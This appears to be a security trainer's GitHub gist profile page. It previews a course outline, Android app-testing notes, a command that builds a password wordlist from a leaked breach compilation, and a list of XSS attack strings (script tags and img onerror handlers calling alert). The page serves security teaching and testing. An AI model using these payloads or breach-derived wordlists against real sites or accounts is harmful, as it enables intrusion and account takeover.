Skip to content

Instantly share code, notes, and snippets.

View sempf's full-sized avatar

Bill Sempf sempf

52 followers · 15 following
View GitHub Profile
@sempf
sempf / DevelopingKids.md
Last active January 12, 2024 19:02
Developing Kids - a Retrospective
@sempf
sempf / CodeMashAppsec2020.md
Last active January 17, 2020 16:18
CodeMash 2020 Appsec Course Outline

At CodeMash 2.0.2.0 we covered a lot of topics in Application Security. Can't share my slides (we didn't use many anyway) but I can make a list of resources based on what we talked about. Many of these are OWASP links, and OWASP is transitioning from MediaWiki to GitHub, so it might take a little work over time to find the resource. That said, let's do what we can.

The class started by talking about the OWASP Security Principles. https://wiki.owasp.org/index.php/OWASP_Security_Principles_Project

Then we dove into vulnerability assessment. Our target? OWASP Juice Shop. https://github.com/bkimminich/juice-shop

The browser most used was FireFox. https://www.mozilla.org/en-US/firefox/

And between those we used an attack proxy. For this class we used Burp Suite Community Edition. https://portswigger.net/burp

@sempf
sempf / breachcompilation.txt
Created December 22, 2017 14:47
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@sempf
sempf / gist:f44714afe0050b83b6e647261d53b43e
Created April 4, 2017 00:05
666 XSS Vectors collected from the web
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@sempf
sempf / gist:c43eeeb0fa6f6a9c19e62d808301c273
Created April 3, 2017 22:02
How to configure a new testing Android device in Genymotion.
Get Genymotion from https://www.genymotion.com/
Pay for it. For crying out loud.
OK, now set up a device one version of Android behind, and using a Google image.
Start it.
Click OK on the AAPT not found.
After it boots, we need the Google apps. What you thought Android was open source? HAHAHAHAHAHA.
First, we need ARM translation.
Search for "genymotion arm translation download" and pick the least eggregious download site. Make sure you are wearing a digital condom.
Now the apps.
Open http://opengapps.org/
@sempf
sempf / gist:e3645da8abeae04bd8cdae6390353750
Created September 28, 2016 01:31
DerbyCon 2016 presentation - Breaking Android Apps for Fun and Profit
What I'm talking about
• Intro
• Mobile Top 10
• Set up a test Gmail account
• Connect it to Facebook, Twitter, Linkedin if you can.
Local test environment
• Genymotion
○ Required VirtualBox
@sempf
sempf / keybase.md
Created March 17, 2014 14:38

Keybase proof

I hereby claim:

  • I am sempf on github.
  • I am sempf (https://keybase.io/sempf) on keybase.
  • I have a public key whose fingerprint is 47A9 74E1 8C28 B419 A092 791F A628 D30E 5565 EC89

To claim this, I am signing this object: